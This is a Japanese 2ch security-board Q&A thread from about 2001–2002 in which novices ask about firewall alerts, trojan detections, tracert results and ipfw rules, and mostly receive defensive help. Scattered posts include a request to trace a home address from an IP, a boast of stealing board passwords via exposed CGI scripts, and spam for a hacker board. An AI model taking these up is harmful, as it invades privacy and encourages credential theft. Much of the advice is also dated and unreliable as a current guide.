つつかれてるだけなら飼っている人を捜しているだけなので問題ないです。
飼ってるのなら駆除しましょう。

モデムの電源切ってIP変更したのに
207.195.141.162からの5000番台スキャンが繰り返されてる・・・
ルート検索すると途中のルータ（ゲートウェイ？）でフィルタリングされてるって出て到達できない
IP管理してるとこはWhoisでCm2.comということはわかったんだが
うちのPCからの発信に基づいてつっついてきてるのかなぁ？
サブPCでゲーム鯖建ててるせいかもしれないけど
ルータでのフィルタリングなんでどのサービスに向けてのものかわからない

IP変更してからNetBIOSポートへのアクセス激増
前の割り当て者はあけっぴろげだったのか（ｗ

>>250
ありがとうございます。
ご指摘の通り感染しているコンピュータからのものと思われます。
管理者の意図的なアタックだとイヤですが・・・(^^;
ファイヤウォールが出力するログを見ていますが、
ホント毎日怪しげなパケットが来るものです。

オンラインウイルス検索をしてみたら、

Trojan System Cleanerが検出され、駆除されました。
JS_PLAY.A

と出ました。
その後２回ほど検索しましたが、これは出ませんでした。
どんな意味なのでしょうか。

ちなみに検索を行ったのは、ここです。
http://www.trendmicro.co.jp/hcall/scan.htm

>253
あなたが自分で書いた通り
「Trojan System Cleanerが検出され、駆除されました。 」
そのままです。他に意味はありません。そういうことです。

JS_PLAY.A

って何でしょうか？

>>256
ウィルスの種類

昨日ネット見てたらサーバーが使用中ですって表示がいきなり出たんだけど
今まで見てたウインドウのほかに小さいウインドウで表示されたんで
すぐ回線きりました　そんなことあるんですか

>>258
ある、それが正常なことか異常なことかはそのURLを言わないと分からない

ありがとうございます。

トロイの木馬は見付かりにくいという事ですが、今の所うちのパソは大丈夫という
事でしょうか。

>>258
それは多分、広告ページが開いたんだろう。
エロサイトに多し。

バスターの鯖マシン用のって、ＶＢより強力ですか？

>>262
バスター、VBにとっての強力、非力とは何ですか？

ZONEALARM入れてるんですけど書き込みがﾏﾀｰﾘ遅いんです。
まあそれはいいんですけど２ｃｈでクッキーをONにしてないといけない
板とかでカキコすると、ファイアーウォールはchoco.2ch.netからの
インターネットアクセスをブロックしました。
と誇らしげに報告をしてきます。まあ報告するのは良いんですけど一体
何をブロックしてるのでしょう？
ちゃんと書き込めていますし・・ｸｷｰをONにしてないときは書き込めませんので
こちら側の情報（人物特定に必要な物？）はｻｰﾊﾞｰ側には行ってるだろうと
思います。疑問に思ったので答えていただければ幸いです。

>>264
http://www.2ch.net/guide/faq.html#F4

>259
>261
URLは忘れました　そうですエロサイトです初めて見たんであせりました
レスありがとうございます

ホントどうでもいい質問だけど、セキュリティ板か通信技術板で(多分)、
シスタープリンセスのあおり文句のパロディの書き込みがあったんだが、
どの板のどのスレか覚えてる人いない?

「ある日突然、あなたのサーバーに12人ものクラッカーがきたらどうしますか？　…」
ってな感じの。

ANTIDOTE for PC Virusesってどうなのかな？
どなたか使ってます？

アンチドートを語ろう♪
http://pc.2ch.net/test/read.cgi?bbs=sec&key=1003987914

>>269 ＞のの
JAVA(ジャバ)とジャバスクリプト切っておきなさい
あとActiveデスクトップも

（リンク追加）
最強のウィルス対策用ソフト
http://pc.2ch.net/test/read.cgi/sec/1000957607/l50

(リンク集追加)

このウイルス何？
http://pc.2ch.net/test/read.cgi/sec/999636595/l50

>267
http://pc.2ch.net/test/read.cgi/linux/1006498763/55

>232　>234
レスありがとう。
実は半年前に3通くらい、Hybrisらしきメールが来たのだが、
当時は何にもウイルスのコトなんか知らなくて、"何だろう"ってそのまま捨てた。
もちろん添付は開いてない。でも、思いきりプレビュー機能使ってた…。

http://housecall.antivirus.com/housecall/start_jp.asp
↑ここでウイルスチェックしても見つからないから大丈夫だとは思うのですが。
どうでしょう？

IP情報から、住所までわかる人いますか？
210.81.153.68

>>274
Hybrisは実行しないと感染しません。

index.htmlを置いてディレクトリ内のファイルを隠している場合
簡単に見る方法はあるのでしょうか？

>>277
設置人と友達になっておしえてもらう

(´[]｀)

>>273
感謝!!
そっか、linux板もたまに見てたんだっけ、俺。
おかげですっきりした。

>>276
Thank you!

>>277
条件がそろえば見える。

名前:PPKNNJPP.EXE
サイズ:23040 byte(s)
種類:application/x-msdownload

RE: じゃなくてNo Subjectだったけど、新種？

今日初めてウィルスバスター2002をインストールしてみたのですが、
「不正アクセス」が検出されてました。
その時間以降、outlookでメールを受信しようとすると、
「パスワードが拒否されました」と、エラー表示が
出て、受信できなくなってしまいました。
どういうことなのでしょうか？？
不正アクセスと、何か関係があるのでしょうか？？
どうすればメールを受信できるようになるのですか？？

>>275
IPについて何か勘違いしてる
犯罪者のＩＰなら警察が方の力を駆使してやってくれるだろうが
一般人はやると犯罪なので何か目的のある人間はともかく
そこら辺で分かる人いますか？と言われてやるｳﾞｧｶはいない

最近ノートン先生をいれたのですが、
今日トロイで僕のパソコンをハッキングしようとしたので
回線を切断しましたとなり、ノートンにより回線が切られていました。
不正侵入試行が6、
攻撃元1
最も頻度の高い攻撃元**.*.***.***
になりました。僕は狙われているのでしょうか？
意図的に誰かハッキングしようとしているのでしょうか？

>>286
とりあえず、トロイ飼ってたら駆除
「意図的に」だろうけど
「意図的に君を狙ってた」かどうかはわからん
回線切ってＩＰかわるならその後もくれば意図的だろう

>>287
ありがとうございます。一応調べましたら
僕のパソコンには感染したものがありませんでした。
少しもセキュリティーの知識がないので不安です。
この板を見て勉強したいとおもいます。ありがとうございました！

>>283
Hybris。実行しないかぎり、感染しません。
つーか、ウイルス対策ソフト入ってないの？

>>289
入れてないのです。もちろんそんなあやしいファイルを
実行したりはしませんが。

>>290
では　OSの行動から全てを手動で行ってください
もしくはスタンドアローンでネットワークに触れないでください

>>291
という事は、エラーなんかのポップアップも自分で認識して
自分の口からアナウンスしなけりゃならんのか。。。

ワード使ってたら、、｢ｸｹｹｹ！ｸｹｹｹ！・・・・ｷｭｰ！ｷｭｰ！｣って、、
イルカ君の真似までしなきゃならんのか。。。
・・・・・激欝

BlackICEが出た頃に、もう一つファイアーウォールが出てたんだけど、
なんだっけ？体験版もあったんだけど。

http://www.coms.ne.jp/~yanwenly/index-trinty.html
http://www.coms.ne.jp/~yanwenly/IPadoresucheck.html

Windows 95/98/Meの人
http://housecall.antivirus.com/housecall/start_jp.asp
↑ウイルスチェックで最初に起動するMS-DOSプロンプトの画面て、何秒くらい表示される?
うちがやると画面現れて一秒もしないうちに閉じるんだけど...これでいいのか??

>>295
MeとかXPはDOS窓出すような作業でも一瞬で消えてしまうのは
仕様だと思うが。

>>296
うちはWin98なのに何故か瞬殺される...

>>297
俺も98で瞬殺だよ。気にするな。

>>298
Thanks...ﾖｶﾀ

「Goner」ワームの犯人は高校生 - いたずらが動機も当局は被害を重視
http://pcweb.mycom.co.jp/news/2001/12/11/16.html

《ﾟДﾟ》2年半じゃ足らねーよ　ｺﾞﾗｧ！！

ネット接続していると
�@頻繁に特定IPからクローキング受信がある
�A過去にアクセスしたHPに勝手にアクセスをしている模様
（自分のHPでアクセスログとったら、定期的にアクセスが記録されている）
これって何だろう？
当方はLAN接続でグローバル固定IPではないが、IPがずーっと不変
不安だ。

追加
ウィルスバスター2002（お試し版）を今のところ使ってるが
検索では引っかからない。

ここのＨＰ逝くとファイアーウォールに警告が出るんだが…。
http://www4.airnet.ne.jp/nekomi/nekomijikan/index.html

ここって､トロイ発信してるＨＰって事で認識していいの？
ファイアーウォールない奴が逝ったらやばいよな？

>>304
そういう疑わしいところを直ﾘﾝしないように

>>304
そのページ自体に変なところはなさそうだけど。
どんな警告が出るの？

JAVAもCGIも使ってないのに何に反応してるんだ・・・？

教えてください。
ＰＩＣＳ.ＤＯＣ（1）ｓｃｒというファイル
にはどのような危険性があるのでしょうか？
また削除したほうがいいのでしょうか？

スクリーンセ−バーを騙るウィルスがあったよな。

http://www.top.or.jp/~godhand/a2.html
をクリックしたらなにか大変そうなことのになってしまいました。
助けてください、、。

>>310
何が大変なんだ。
詳細くらい書けヴォケ

>>310-311
Jacascriptでなにやら『強制ダウンロード』してそれを『インストールした』って感じのメッセージ類を表示する。
それだけ。
でも、知識のない人には本物のウイルスなんかより効きそう。

レスが遅れてしまいました。

>>305　すいません。
>>306　こんな感じです。

プロトコル：ＴＣＰ(インバウンド)
リモートアドレス：www4.airnet.ne.jp(210.159.65.178)
リモートコンピュータ（www4.airnet.ne.jp）がリモートアクセスの
トロイの木馬によってこのコンピュータの通常使うポートに対する
接続を試行しました。

sageて書いてしまった…。
逝ってきます。

>>304
たしかにそこへアクセスすると、そこのサーバーからTCPパケットが
ローカルポート11000と9801へ、数回飛んできますよね。

アヤシイところといえば…、
ページ下の部分のGIF画像(10000.GIF 1000.GIF 100.GIF 10.GIF）
が時間帯によって個数が変わったり、それにしたがって飛んでくる
TCPパケットの数も変化することぐらいです。

通信できるかどうか試験パケットを飛ばしてるんだと思いますが…。

>>315
それじゃぁ、トロイ本体を飛ばしてるんじゃなくて､
トロイにかかってるパソコンがいたら操ろうという魂胆で
ハッキング試行でもしてきてるんですかね？
どっちみち、あんまり気分のいいものじゃありませんけれど。。。

11000と9801っていったらSSTPだね。危険な物じゃないよ。

>>316
つか、トロイ本体は鳥羽戦のだが。。。
あくまで起動させるためにケツひっぱたいてみるだけだと思われ。

補足
SSTPってのは『何か（旧偽春菜）』っていうデスクトップマスコットにメッセージを
表示されるためのプロトコル。
最初は11000を使ってたんだけどこのポートはトロイが使ってるので
今回のように騒がれたりなどの問題あるから9801に変更された。

ふむ。なるほど、マスコットのケツを引っ叩いてるのか…。

スパンキング任意たん;;´Д｀)ﾊｧﾊｧ

>>312
初心者スレで5回もがいしゅつです（ｗ
いいかげんログ見ることを覚えて欲しいよ…

msbbってのが頻繁にどっかにアクセスしようとしてるんですが、
こいつは何ですか？whoisでも発見できず・・・

>>323
それだけじゃ誰も判らんと思うぞ
http://www.google.com/search?q=cache:77EEWkIVpOk:www.geocrawler.com/archives/3/192/2001/10/50/6915969/+msbb&hl=ja
これか？

>>324
それですそれ。msbb.exe。
あっ環境忘れた（；´Д｀）
WIN98SE
ぞぬで防御中です。

なんか見知らぬ人（会社？EAST BEANてどこ？から、
『サンタさんからクリスマスプレゼントです☆』とかいうメールがきた。
むちゃくちゃあやしすぎる（Ｗ

昨今のウィルス騒ぎがあるので、確認もせず受信トレイごと廃棄したよ。
ほほえましいが、やめてよね！・・・って感じ。
単なる疑心暗鬼ならいいけど。

それなりに公的な団体に送信フォームを通じて、メアドを記入した上で問い合
わせをした所、二日続けて3通「WORM_BADTRANS.B」が添付されたメールが送ら
れて来ました。

「アンタ、ウィルスに感染してるよ」と返信したのですが、全て
「This Message was undeliverable due to the following reason」で
エラーとなりました。

日頃は使用していないメアドを記入したので、この団体以外に送信される心当
たりは無いのですが、偶然以外に原因は何か考えられますでしょうか？

又、送信元を付き止めるには、ヘッダをうｐするのが一番早い様な気がする(私
自身は何が何やら、さっぱり判りまへん(w)のですが、こちらでお願いしても良
いでしょうか？

>ヘッダをうｐするのが
やめなされ。風が吹けば風呂屋がなんとやらぢゃ。。。
・・あり？？

ﾊｧ・・・尻の穴が痛くてかなわん。。

_***@%%%.jp
↑
このアンダーバーを外す

http://isweb31.infoseek.co.jp/photo/mindb/spacebunnie/bunnievirus.htm

これって本当にウイルスですか？
面白半分に実行したら確かに説明書きどおりにビープ音を鳴らすcomファイル
ができちまいました。
シマンテック、トレンドマイクロともひっかかりません。
exeには感染せず、comにしか感染しないと説明書に書いてあります。
実害がほとんどないから定義ファイルに入っていないってことですか？

>>330
確かに実害が少ないと、無視される事もあるけど、あまり関係ないのでは？
ジョークソフトじゃないのですか？

仕事でNmapNTを使いたいのですが、
2000にいれましたが使えません。
管理者権限でログインしてますし、packet.dllを
落としましたが、使えません。
DOS画面が出て終わりです。
何か良い方法はないでしょうか？

今あまり使わない、ＰＣを今日見たらC\windows\systemに
「いたずらしてごめんね1個目のフォルダです。」
というのが１０００個目まで出来上がってた。ちなみに作成日は11月21でした。
これは何？俺以外が触ることはありません。
ご存知の方いましたら教えてください。お願いします。

>>327
それはまた、災難でしたね。
可能性としては、一度でもどこかで使ったのなら必ずしも特定できはしませんけども、
確かに、その公的団体の所で使ったのが、原因かもしれません。
でも、普通は、そういう所はウィルスを送らないような気もするけど…セキュリティチェック甘いのかな？（汗
対応作としては「無視」です。反撃や文句は考えない方が良いです。
で、返信しても使えないと言うのは腑に落ちませんが、返せないのなら、なおさら無視しましょう。

後、ヘッダをウプすると確かに一番早い気はしますけど、
私も経験ありますけどヘッダの情報を書き換えたり、消したりできるんです。
まぁ。そのウィルスメールに情報が書いてあればそれで良いんですけどね。
上げない方が良いと思いますけど、もしあげるのであれば、自分の部分はちゃんと消す様に。
自分のと相手のの区別がつかないようなら、諦めてください（ｗ

>>333
本格的にやばいです。（汗

>>332
こちらをご覧下さい
http://www.google.com/search?q=nmapnt&hl=ja&btnG=Google+%8C%9F%8D%F5&lr=lang_ja

すまそ。半分だけ自己解決。
とりあえずトロイでした。はやく削除しないと。
欝だ。なんでﾉｰﾄﾝ感知してくんないんだYO！

でも良く考えたら、俺はこのSubSevenを感染前に検疫にいれたのに
なんで感染してんだろ？そういうものなのかな？
さらにウィルススキャンしたらMacro.srcなんてのにも感染してるし･･･。
これ何？しばらくこのPC使ってなかったからご立腹なのか？欝だ。

ノートン入れたら２ｃｈに書き込み出来なくなりました。
かちゅからもIEからも書き込めません。
ブラウザ変ですよんって表示されます。
今はアンインストールして書き込んでるんですけど、
なんの設定をすれば書き込めるようになるんですか？
教えてください。

>>338
プライバシー制御でプライバシーを無効にするのが早い。
無効にするのは怖いが特に問題なし。

>>339
ありがとうございます！
早速やってみます。

ノートンはウィルスには良いが、セキュリティー方面はおまけみたいなところがあるからな。
むしろ、無効にした方が良い。へたに、高めていると大切なものまで通信不能にされる事もあるから。

何気にゾーンアラームみたら、以下のような警告が55回も!!!
「The firewall has blocked Internet access to your computer (IDENT)
　 from 172.17.1.2 (TCP Port 61844) [TCP Flags: S].」

これってどういう意味なんでしょう・・・
初心者なんでマジびびってます。

ちなみにOUTLOOKを起動すると100％感知するようです。

>>342
防火壁はあんたのパソからのインターネットアクセスをブロックした
そいつは　172.17.1.2 のポート 61844へアクセスしようとした。

ってローカルIPじゃん?　342さん会社で使用してるとか?
けど 61844ポート って　何よ

>>343
会社では使用してないけど専用線ではあります。
現在も5分おきくらいに似たような警告が・・・

すまん　逆だ
貴方のPCへインターネット172.17.1.2からのアクセスを
の間違いで鬱だ詩嚢

>>344
まず自分のPCのIPしらべれ
次に
tracert 172.17.1.2
貴様の専用線って　どんな専用線ですか?

>>343
英語の勉強し直し！
to your computer (IDENT)
あなたのコンピューターへ （IDENT←こっちが本題だ！）
from 172.17.1.2 (TCP Port 61844)
172.17.1.2 （TCP ポート 61844←関係ない！）から

>>342
WinでIDENT鯖動いてないだろうから問題はないはず

>>345
すまねえ。訂正してた。

漏れも共倒れ宇津だ詩嚢

>>343
自分のIPは
61.114.XXX.XXX
あと、専用線じゃなくってローカルCATVの常時接続サービスの間違いです。

>>349
大方CATVだろうとおもたよ。
traceroute の　結果は?
172.17.1.2はたぶんそのCATVの網の中にあるルーターとかじゃないかな

グーグルでtracerouteを検索かけて
172.17.1.2でやってるんですが、なかなか結果が出ません・・・

ちなみにuwhoisで上記ipの検索かけたら
IANA-BBLK-RESERVED
ってトコに引っかかりました。
英語駄目駄目なんで意味がわかりませんが・・・

>>351
それ、どっかのWEBからで永遠と出ない

スタートボタン>>ファイル名を指定して実行>>command.comと入力
プロンプト出たら
tracert 172.17.1.2

>>352
RFC1998 CLASS-B PRIVATE 172.16.0.0 -172.31.255.255
いあんな。

>>352
10.0.0.0/8、172.16.0.0/12、192.168.0.0/16はプライベートIPだってば。
だからグローバルでいくら探しても出てこない

一応トレース（4まで）終了したけど何が何やら・・・
とにかくゾーンアラームの警告が100回も200回も出て、正直ウザイです。
ほっといても問題ないのかな？

>>356
自分のPCでやったTRACERT の結果をUPするとエエ。
貴様のIPと2hop目ぐらいまではかくしていいよー。

自分のIPは出てないんですよね・・・

3 10ms 24ms 15ms 172.17.0.253
4 13ms 13ms 13ms 172.17.1.2

trace complete.

>>358
終了終了
気にすんな。
そのプロバイダのsendmailがident返ししてると思われる。
ためしにnslookup 172.17.1.2　してみれば
貴様が使用しているsmtpの見たような名前が出るだろう。

>>343
こんな厨房の質問に長々と答えてもらってありがとです。
２ｃｈではじめて人のやさしさに触れた気がします。
それでは・・・

nslookup 172.17.1.2:unkown
自分のsmtp 211.9.xx.x

なんですけど気にしなくていいですよね。

>>361
きにしなくてもいい
211.9 が内部用として 172.17.1.2を使用していると見るべき。

zone はIDENT応答は自動で処理するって聞いてるけど、
>>342 の場合は、なんで反応したんだろうねぇ〜。
そっちのが不思議なんだが…

>>51
Outpostって何？

ＢＬＡＣＫＩＣＥはトロイが動き出した時警告してくれます？
ｚｏｎｅａｌａｒｍみたいに許可がないと接続が出来ないみたいな。

>>365
アウトバウンドは監視しません。
一般家庭なら、普通のFWで十分です。

黒氷はIDSだってさんざん言ってんだろが

そうなんですか〜ありがとうゴザイマス！

zoneAlaram とかって便利だけど遅くならない？
TeraTerm とかで一文字打つたびにメーターがピコピコしてくれるんだけど。。。

>>369
遅くなるというか、動作が重たいのはあります。
後は、OSとPCのスペックしだいです。私の環境では重いです（笑

MS01-058により5.01は完全に撃沈

つか、NT系にしろWIN98にしろ
まともなHOTFIXした状態で
personal FWの類入れてなくて困ることってなんだろう
入れてて困った事はカナｰリあるけど。

>>370
別ｽﾚ見て Sygate にしましたです。まぁこれでも遅くはなるんでしょうけど
zoneAlarm ほどピコピコが派手じゃないのでまだﾏｼかと。

今このスレみてトレンドマイクロのオンラインスキャン実行したら、

Trojan System Cleanerが検出され、駆除されました。
TROJ_SUB7.12 TROJ_SUB7.13

ってでて再起動すれって言われてまたスキャンして同じ事言われて・・を
10回位繰り返してるんですが、どうしたらいいでしょうか？
厨房で申し訳ないんですが、助けて下さい・・。

>>374
全ドライブ検索の結果は？

>>375
レス有難う御座います！
いまやってる所なんですが、とりあえず

TROJ_SUB7.MUIE.E

とういのに感染してしまっている様です・・。
ちなみに

C\Windows\nhbmlyt.exe

にあります。
宜しくお願いします！

>>376
検出されたウイルスの特徴・駆除方法を
トレンドマイクロのウイルスデータデースのページで調べる。

無ければ、駆除ソフトを買いにいれ

>>377 >>378
駆除できました！本当に有難う御座いました！
人にPC弄られていたと思うと怖いですね・・。

>>379
良き良き。解決できて何より。確かに人にPCを触られていると思うと、安心して使えませんからね。

アングラ系のページを見ていたら、インターネットオプションが
開けなくなっていました。なんか”制限されています”とでて、
見れませんでした。
これがクラックツール言うのでしょうか？
どのように対処すればいいのかどなたか教えてもらえないでしょうか？
お願いします。

http://usagi.tadaima.com/2chbbs/subback.html
これ踏んじゃったけど大丈夫ですかね？

ヤフーオークションで、凄い人気商品、発見！！！

「高性能電子辞書」が、たったの 3900 円↓
http://page2.auctions.yahoo.co.jp/jp/auction/b18711631

なかなか手に入らない「一括メール 2001」↓
http://page2.auctions.yahoo.co.jp/jp/auction/b18890297

今は無き「コピーガードキャンセラー」↓
http://page2.auctions.yahoo.co.jp/jp/auction/b18880293

ヤフーオークション内では、現在、このオークション
の話題で、持ちきりです。

>>383
どこが親切やねん。

>>372
やっぱり、スパイウェアとトロイの活動封じじゃないかな？
外部からのフィルタリングはオマケみたいなもんだし…。

>>384
FW入れとかないと
IEが妙なところへ繋ぎに逝ったときわからんよ

ウェブ上をさまよっていたら突然ウィンドウズの警告音やその他コンピュータから
の全ての音声が変になってギャリギャリいう音になってしまいました！どうすれ
ばいいのでしょうか！

スピーカーの故障？　＞386

何処で聞いたらいいのかよく分からないんですが、まずここで質問させてください。

昨日の夜、何にもしてないPCの電源が突然入ったんです。
CATVでネットにつないでます。
なので、LANケーブルはつないだままでしたが、電源は完全に切ってありました。
なんだかよく分からず不気味だったので、とりあえずケーブル引き抜いて慌てて電源切りました。

電源を切ってあるPCを外部から操作するなんて事が可能なんでしょうか？
不可能だとすると電源が入った原因としては何が考えられるんでしょう？

ファイヤーウォールは入れてません。
ウイルスソフトはノートンがはいってます。
（ちなみにウイルスはチェック済みです。）
ｗ９８seです。

>>388
・LANがウェイクアップに対応しているので、信号を送られ起動した。

・電圧低下やノイズなどにより、PCが電源を入れたと勘違いして誤作動。

・ウイルスなどによりそういう仕組みが組み込まれた。

上の2つが可能性高いかと。
CATVならファイアーウォールを入れることをお薦めします。

>>389
PCの勘違い誤作動ということがあるんですか・・・
外部操作の可能性はないということでいいんでしょうか？
とりあえずファイアーウォールいれます（＾＾;。
レスありがとうございました。

ログ見てたら、今日 6112/tcp に外から接続してきた奴がいた。
これって CDE の脆弱性を衝こうとしてるのかな？

>>388-389
ちょいとお邪魔致します。３８８さん＋便乗質問なんですが、
うちもＣＡＴＶ＋ファイアーオールですが
もし何らかの外からの侵入らしきものを調べるときは
どうすればいいのでしょうか？
今のところ勘違い電源ＯＮもありませんが、怖いので。
３９１さんみたいに、ログを見る？という初歩的なことが
イマイチわかりません。
（どこを見たらわかるんでしょう？？internet option？）

ウィルスの場合は、マカダメ＆シマンテックでオンラインスキャンして
なんとか持ちこたえましたが、この先のいざ！に備えて勉強したいので
どうか教えてくださいませ。ｍ（__）ｍ
ＯＳは９８ＳＥです。

>>392
ファイアーウォールがログ取ってるんじゃない？
OS標準でそういうログを取るようなことはしないよ。

>>392
ファイアーウォール(以下FW)にログが残ると思います。
FWはノートンとか市販されてます。フリーでもZoneAlarmやTinyとかあります。
ここの板にも色々FWなどの情報がありますので、参考にしてみてください。

あと、ノートンなりバスターなりウイルス対策ソフトは入れておいたほうがいいです。
オンラインはちょっとめんどくさいですし。

>>393-394
ありがとうございました。ＦＷがログをとっていました。
ワードパッドで読むこともできました。
マニュアル読んでもピンときていなかったので
非常に助かりました。ｍ（__）ｍ

FreeBSDでNICを二枚刺し、PPPoEで接続しています。
FWの設定はこんな感じで良いのでしょうか？
ipfw add deny log ip from any to any frag
ipfw add allow ip from any to any via 内部LANのNIC
ipfw add allow ip from any to any via lo0
ipfw add deny log ip from 192.168.0.0/16 to any in
ipfw add deny log ip from 172.16.0.0/12 to any
ipfw add deny log ip from 10.0.0.0/8 to any
ipfw add allow tcp from any to any established
ipfw add allow tcp from any to any out
ipfw add allow udp from any to DNSのIP 53
ipfw add allow udp from DNSのIP 53 to any
ipfw add allow udp from any to セカンダリDNSのIP 53
ipfw add allow udp from セカンダリDNSのIP 53 to any
ipfw add deny log tcp from any to any
ipfw add allow udp from NTPサーバのIP 123 to any
ipfw add allow udp from any to NTPサーバのIP 123
ipfw add allow log icmp from any to any out icmptype 8
ipfw add allow log icmp from any to any in icmptype 0
ipfw add deny log ip from any to any

>>1
＞スレッドを立てるまでもない質問などはここに

>>396
TCPが甘いね

甘いと言うか・・・ノーチェック？

おちてたよ

まずここで聞きますが、お願い致します。

実はさきほどまたＲＥメールが１通きてました。
とりあえずアウトルックで全メール削除（ＤＭ）
そのあとマカフィーＦＷのイベントログを読むと

不明のトラフィック（情報）
着信ＴＣＰをブロックしています。というのが３つあって
１つめは
src=207,86,3,139
dst=211,133,229,220
sport=1199
dport=53(305)

もう２つは
src=67,104,51,129
sport-2233
dport-25(305)
となっています。

マニュアルを読んでもサッパリわかりません。
どこかのスレでｓｒｃ＝スクリーンセイバー？(ウィルス？）
を送りつけるとかいうのを読んだ気がします。
自分の何か早合点なのか？本当になにかアタックされているか
実のところよくわかりません（情けない・・・）

もしそうなら送り主を調べたい＆こういう場合、何をどう対処するのが
１番いいのでしょうか？再び教えてちゃんですみませんが、
お願い致します。

src=ソース（IPアドレス/ポート）
dst=醤油（IPアドレス/ポート）

>>402
どうもありがとう！
やっぱ自分バカです・・・恥ずかしい（／／／／）
早合点でいいのですね・・・回線きって鬱死てきます。

ＩＰ断片化についての質問です。
Norton Internet Security 2002を導入し、
「断片化したＩＰパケットを遮断する」設定にすると、
WMP6.4でストリーミング受信ができない場合があります。
NIS2002のHelp説明によれば、
「ひどく断片化したパケットを遮断します。
通常この種類のパケットは正当なネットワーク通信のためでなく、
攻撃の目的で使います。」、と書いてあるので、
断片パケットを許可のまま使用することに不安があります。
ちなみにＭＴＵ＝１４５４、ＲＷＩＮ＝６５５３５です。

そこで質問。
（１）断片パケットを許可すると、具体的にどういうリスクが
あるのでしょうか？
（２）現在NIS2002のFW設定は最高度で使用していますが、
断片ＩＰパケットを許可したばあい、それでもリスクは
残るのでしょうか？
（３）ＯＳの通信設定をかえることで断片パケットが出なくする、
あるいは出にくくする方法ありますか？

よろしくご教授ください。

添削きぼんぬ

>>404
(1)
へたれなシステムでは断片パケットの受信を想定してないことがある。
このようなパケットを受信することにより、OSが異常終了するなどの
障害が発生する場合がある。
参考：
http://www.microsoft.com/japan/support/kb/articles/JP259/7/28.asp
http://www.google.com/search?hl=ja&q=%92f%95%D0++exploit&lr=

(2)
サポートに聞け

(3)
断片パケットはよそからやってくるものなので
そーいう方法は無い

>>405
情報ありがとうございます。参考になりました。
それにしてもシステムダウンとは怖いですね。

ｴﾛｻｲﾄその他不正のサイトをプロキシのアクセスコントロールで接続不可にしたいのですが、
定期的に更新される無料サイトリストってどっかにころがってないっすかねぇ…。

…って板違い?

識者の方々に相談したいことがあります。
トンチンカンな相談かもしれませんが…

修行がてら、Linux+ApacheでHTTPサーバを設置してみたのですが、
未だに、CodeRedだかNimdaだかに侵されたNTサーバから、
結構な数のアクセスがあります。
流行してたのいつの話だよ、今までコイツラ何やってんだよヲイ。

一応、それらのアクセスは、別のlogに切り分けるよう
設定はしているものの…正直ウザイ。ウザすぎる。
特に、HDD容量は雀の涙、回線は爺ちゃんのションベンのように
チョロチョロしたり途切れたりするような、
それはもう哀しさ溢れ巻くりングのヘタレサーバでありんすので
それらのアクセスだけで、もうかなりうんざり状態なのレス…

故に、できるなら、それらナマケモノ管理者達に、
「あんたのサーバやべえよ…なんとかしろよ…」
と知らせたいのですが…手元に残ってるのはIPアドレスのみ…

この場合どうすれば彼等に、ウイルスに感染してる事実を、
バックドアが仕込まれてる事実を、知らせる事ができるのでしょう。
何か良い手はありませんでしょうか？

なにぶん当方、まだまだ修行中の身であり、
ネットワールドのルール・しきたりを全然知らない上に
英語もサパーリな完全無敵絶対運命厨房なので、
何が最も波風立たない方法なのかがよーわからんのであります。

きっと向こうはこっち以上にバカばかりだから、
下手にバックドア使ってメッセージ送っただけでも、
「すわ！ サイバーテロだ！！」
とかアホなことヌカして大騒ぎしそうな感もあり。
（ってテメエがむしろテロになってんの気がつかねーのかこのボケ、
と言いたい。問い詰めたい。小１時間問い詰めたい）

どないしたらええんでしゃっろ…

典型的な犬厨だな。とっとと犬小屋に帰れよ。

まあ、お前みたいなやつはローカルでやってろってこった。

>>408
良い手があったらあんたがこんな相談することもなかったでしょう。

>>407
それって、教育機関などを相手に結構いい商売になっているから、
なかなか無料でってのは難しいと思う。
あったとしたら、機械的に言葉とか分類で切られているんじゃないか。
商売でやっているところは、人手で洗っているからコスト食う。

>>408
目には目を。歯には歯を。
ウイルスにはウイルスで対抗するしか（嘘

／／／／／／／／／／／／／／／／／／／

■ 全国のハッカー＆荒らし集合！！ ■




http://kgy999.ath.cx/cgi-bin/1/2.cgi
史上最悪のUG掲示板

／／／／／／／／／／／／／／／／／／／／／


:::
::::

>411

うちの掲示板を閲覧する人で
教師らしいのですが、
「職場のＰＣからは閲覧できない（笑）」
って、そればっかり書き込みする人がいてうんざりしています。

まるでエロ話しかしていないと言わんばかりでかなりムカついている。
本人はこっちがムカついているとは全く気が付いていないで
無邪気なものです。

教師って世間が狭くていやだ！

>>414
おぬしは了見がせまいのう

>>411
やっぱり(笑)。レスありがとう。
諦めて金かけるかぁ…。

>>415
そうかもね(^^;

いつもいつもそのことばっかり書き込みするのはその先生だけなので、
教師って他に話題がないのかと思って(^^;

>>414,>>415,>>417
まあ、なんちゅうか、掲示板とかチャットは全部ダメってつもりで、
cgi-binなんちゅうパス名で制限していたりするケースもあるから、
こういうのやられると、どんな無害な掲示板でも制限され、
反面２チャンだとピンクチャンネルですら見られたりする（藁
個人のサイトとかは、プロバイダの掲示板使っていたりするから、
cgi-binでひっかかったりするのよね。
多分そゆことグチりたいのではないかな、そのセンセ。

TCP Port 1214へのアクセスがzoneAlarmの今日のログに結構記録されてるんですが、
このポートはどういうサービスが利用しているんですか？

米鳥でcgiスクリプト見放題!
今、掲示板のパス抜きまくってるぞー

>>420
本当だ。
やばいね★彡

>>419
http://www.kazaa.com/
↑たぶんこれじゃないですか？

新たに新スレを立てるまでもないので
ここに書き込ませてもらいます。
いったい何時になったら、ハッキングが
無くなるのでしょうか？

それを楽しんでいる人にとっては笑い事でしょうが
正直怖いし、気持ち悪いです。
何年もメールアカウントを変えない、パスワードを変えない
のは論外として、ハッカーにしてみれば他人のパソコンに進入するのは
朝飯前でしょ。
ネットワークである以上、ユーザー名、パスワードなど文字で設定している間は
ハッキングという問題は永遠に無くならないと思います。

パソコンを起動させる際、身体的特徴、例えば個人特有の指紋とかで
認識させるというは技術上可能なはず。
メーカーはそういったパソコンを開発しているのでしょうか？

>>423
423さんが考えてるような部分からじゃないんだす。進入
って。

>>422
どうも。
やっぱりファイル共有サービス系だったか…（´へ｀）ﾊｧ

初めてオンラインスキャンをしたらウィルスに感染してた。
絶対大丈夫だと思ってたんだけど・・・。
かなり鬱だ。

eazyfoxさんのところ掲示板見れないけど何かあったの？

プロバイダ側の自分のサイトのwwwに、見たことの無いファイルが存在していました。
ファイル名が「dead」でLETTERファイルと記載されていました。
気味が悪いので中身を見ないで削除しましたが、これは何者かに進入されているのでしょうか？
試しにウイルスチェッカーを利用したところ、ウイルスは無かったのですが、トロイが１つ見つかりました。
「削除しました」と表示されてはいるんですが、不安で仕方が無いんです。
どなたか詳しくわかる方いらっしゃらないでしょうか？
宜しくお願い致します。

>>428
ここの一番下のところ読んで
